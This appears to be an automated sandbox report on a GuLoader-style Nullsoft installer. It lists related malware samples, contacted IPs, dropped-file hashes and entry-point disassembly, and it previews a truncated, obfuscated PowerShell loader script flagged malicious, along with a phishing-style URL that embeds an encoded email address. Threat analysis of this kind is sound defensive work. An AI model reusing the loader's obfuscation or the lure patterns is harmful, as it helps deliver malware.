                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          CLOUDFLARENETUSgH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.96.1
                                                                                                          Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 172.67.186.192
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.48.1
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.48.1
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=Get hashmaliciousUnknownBrowse
                                                                                                          • 104.17.25.14
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.16.1
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          iRmpdWgpoF.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          3pwbTZtiDu.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          37f463bf4616ecd445d4a1937da06e19b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.185.206
                                                                                                          • 142.250.184.193
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dllTeamViewer_Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                              REF_17218_VV-0002.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                PO_00290292.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                  teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                                                                    teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                                                                      SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                        SMGS-RCDU5010031.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                          RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                            RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):53158
                                                                                                                              Entropy (8bit):5.062687652912555
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6656
                                                                                                                              Entropy (8bit):5.140229856656103
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                                                                              MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                                                                              SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                                                                              SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                                                                              SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: TeamViewer_Setup.exe, Detection: malicious, Browse
                                                                                                                              • Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse
                                                                                                                              • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                                                                              • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                              • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):779915
                                                                                                                              Entropy (8bit):7.773267127155475
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:0GCX77iIcM1saeQHgPVseMP/pmRR324xFcdW693tRLPHj6XOaho:qr75cgYQHgK3PxEBXi93tJPDUOB
                                                                                                                              MD5:A1204C6A7FE28BAB5DB0E3240513A857
                                                                                                                              SHA1:909F041EFC5859B43F547017085E3CF39A05A4FA
                                                                                                                              SHA-256:8806CE311854FA80261E855453C07D30B43A24D413C65CDFAAE99024408BD6FF
                                                                                                                              SHA-512:7D7C39189E6BC7C5339E08154DBBC45230B07FF55B62DADFE9828851276C0111AB76C143931D7A097395204CD2DF2F00D2647F5E6F0E3254999988635C409777
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):26
                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                              Malicious:true
                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):362270
                                                                                                                              Entropy (8bit):1.2455855418607977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
                                                                                                                              MD5:9FA2163989C46356E859FEA0B8963C98
                                                                                                                              SHA1:7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
                                                                                                                              SHA-256:3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
                                                                                                                              SHA-512:39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
                                                                                                                              Malicious:false
                                                                                                                              Preview:.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):261410
                                                                                                                              Entropy (8bit):1.2549428792982014
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
                                                                                                                              MD5:37AEF816B4DE967A79095F52FE324B50
                                                                                                                              SHA1:5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
                                                                                                                              SHA-256:3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
                                                                                                                              SHA-512:D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
                                                                                                                              Malicious:false
                                                                                                                              Preview:..........................c..........................................................................................................L......................................0......................)....................1D......................R....|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):452801
                                                                                                                              Entropy (8bit):1.253535297499313
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
                                                                                                                              MD5:36666AD5AFAD8972D1AC9D4BB141614D
                                                                                                                              SHA1:2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
                                                                                                                              SHA-256:03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
                                                                                                                              SHA-512:51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
                                                                                                                              Malicious:false
                                                                                                                              Preview:.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4231), with CRLF, LF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):73643
                                                                                                                              Entropy (8bit):5.168473526958651
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:gCxW3WSOp9TSAX3mrJVmm0nvexpoJ4t4buPrPZ68DJmd9xu1fVBrHxgMw1:gN3WpFX3sHmDvexpU46aPdJSyBy
                                                                                                                              MD5:ED7E63CF5634B14FE01D4DE956824D88
                                                                                                                              SHA1:1F765A37046506FC4125BE6841C907AD14D6D241
                                                                                                                              SHA-256:1AD13D6915FD2F28864EC1D26A89E3C3918BBEAE7575CEC876FE12A184C66D47
                                                                                                                              SHA-512:FFCC939991C5C8030342F7975635D9C54D08A2D45FAE760663E5888DC5C5552AC05082F87905D0E4167B13512BC2FB8BA5E5291CF87C8941E29E5C7B3A75E861
                                                                                                                              Malicious:true
                                                                                                                              Preview:$Zoonomist=$Clavatin;........$Grundtallene = @'.Oprykn . Slikke$FucoidaUOotidssbMi geleuAftnensnkonkur dSv ngeneT.yreostSjllandhFravig eUr varsd Ang,opsKrigskurLokummer Go,meuiGlucolit latiniaDi.kofitL ctucaeBalkjoldSkrivem8 brahma4 Legali=Nyta.rs$UnderfuSHngeparoOvernouvMaskinaeSmokewosRestablaProjektlKvldendeCo.hurns Algaro;Revsere.Soarin f peratruUdvekslnAfspistcKatarint D,dekai semafooBloomlenNon ult GelatiGCalceuseBlgmrkenKvalitenM nimumeKuperermUnsalvabDrslgerl,nrighjd VanillnHammochi AbsorpnVerdensgTraadvvsMisties Skyderi( P ragr$SpradsyT AnomaliJudic tlPredisgbOrangiseBlkhusedG,ftigseVariforlUnde gis eforesePakkentnTabposi2Udtyndi2Sungreh3Gibbsit, Forkva$CalabooT CulturiEje doml CholecbDoyl ykeExtradodOmtnksoeDe lasml BufonisCatamarefluidenn oneuph2Squawer2Ze nhan3mumiesefHesperifPseudohrTeametpiIntercon R,tzesgTritorrs NonpunmfamilieiProtoxyd Tilganlti ingbeMangledrHordary)Arbejds Rev cat{Depotti.Gymnast.Foret.m$ ubilumCGenstanrmistrsty Meso ep MealmetDrifts oSlgtsrezTillb s
                                                                                                                              Process:C:\Users\user\Desktop\4Vx2rUlb0f.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):324401
                                                                                                                              Entropy (8bit):7.6544441224377096
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:Q8rDPoMQ6Z+lcNDJyuZZ3PuIQGVSCm4r7UtJjeg5IGFmIwn7HdX:Qmkm+lDa3PkkK4rgtcd7x
                                                                                                                              MD5:F6A7F77B3A470E3BEFBE2F11DB0C4ACC
                                                                                                                              SHA1:0D7503D0065AE76FCAE637B750F2EE51370E136C
                                                                                                                              SHA-256:562BC5352F4411D89743B1492098F7EAB76E312645FD4458A1C55DBA106DBF7C
                                                                                                                              SHA-512:E29FA29ED411E4236F7F2EDE87886E84E0A1BEA7E9FF5DBAE6CF795CD85A823058B4E2EC19097244190CA3383E93C5D49519D392FB8533F2C1908C11A2730177
                                                                                                                              Malicious:false
                                                                                                                              Preview:................__..SS..............*..............""".................y............./........7../......0..."".................11.............................^^^^.......................lll.........4.......,,.]..........!..............qqqqqqqq...........N.....JJ..........___.M.#.G.................>>>......eeeeee..............?.............y..........s..._..EE....`````.........o..DDDDD........VV................w..d...).A...t.....1........C............................Q..lll..............=...................!!.......................j...................O........M............................SSSSS.j.....**..................QQQ.S.%%........////.............................r........1..77..........D.==...............k..b....7................................................p..6666666............=...............................-......................:....yyyy.]..................`.........TTTTT..))...D.......AA...............................JJ...]..||||..kkkkk..........mmm..........................
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                              Entropy (8bit):7.773267127155475
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:4Vx2rUlb0f.exe
                                                                                                                              File size:779'915 bytes
                                                                                                                              MD5:a1204c6a7fe28bab5db0e3240513a857
                                                                                                                              SHA1:909f041efc5859b43f547017085e3cf39a05a4fa
                                                                                                                              SHA256:8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff
                                                                                                                              SHA512:7d7c39189e6bc7c5339e08154dbbc45230b07ff55b62dadfe9828851276c0111ab76c143931d7a097395204cd2df2f00d2647f5e6f0e3254999988635c409777
                                                                                                                              SSDEEP:12288:0GCX77iIcM1saeQHgPVseMP/pmRR324xFcdW693tRLPHj6XOaho:qr75cgYQHgK3PxEBXi93tJPDUOB
                                                                                                                              TLSH:E1F4E0B3CF396923ED4498B2E42F1DF7977448728655A8033152BD37F9249A6EE0920F
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@
                                                                                                                              Icon Hash:b2b3aeb696aefe9e
                                                                                                                              Entrypoint:0x4032a0
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                                                                                              Instruction
                                                                                                                              sub esp, 000002D4h
                                                                                                                              push ebx
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              push 00000020h
                                                                                                                              pop edi
                                                                                                                              xor ebx, ebx
                                                                                                                              push 00008001h
                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                              call dword ptr [004080B0h]
                                                                                                                              call dword ptr [004080ACh]
                                                                                                                              cmp ax, 00000006h
                                                                                                                              je 00007FAB28B6D403h
                                                                                                                              push ebx
                                                                                                                              call 00007FAB28B70544h
                                                                                                                              cmp eax, ebx
                                                                                                                              je 00007FAB28B6D3F9h
                                                                                                                              push 00000C00h
                                                                                                                              call eax
                                                                                                                              mov esi, 004082B8h
                                                                                                                              push esi
                                                                                                                              call 00007FAB28B704BEh
                                                                                                                              push esi
                                                                                                                              call dword ptr [0040815Ch]
                                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                                              jne 00007FAB28B6D3DCh
                                                                                                                              push ebp
                                                                                                                              push 00000009h
                                                                                                                              call 00007FAB28B70516h
                                                                                                                              push 00000007h
                                                                                                                              call 00007FAB28B7050Fh
                                                                                                                              mov dword ptr [00434EE4h], eax
                                                                                                                              call dword ptr [0040803Ch]
                                                                                                                              push ebx
                                                                                                                              call dword ptr [004082A4h]
                                                                                                                              mov dword ptr [00434F98h], eax
                                                                                                                              push ebx
                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                              push 000002B4h
                                                                                                                              push eax
                                                                                                                              push ebx
                                                                                                                              push 0042B208h
                                                                                                                              call dword ptr [00408188h]
                                                                                                                              push 0040A2C8h
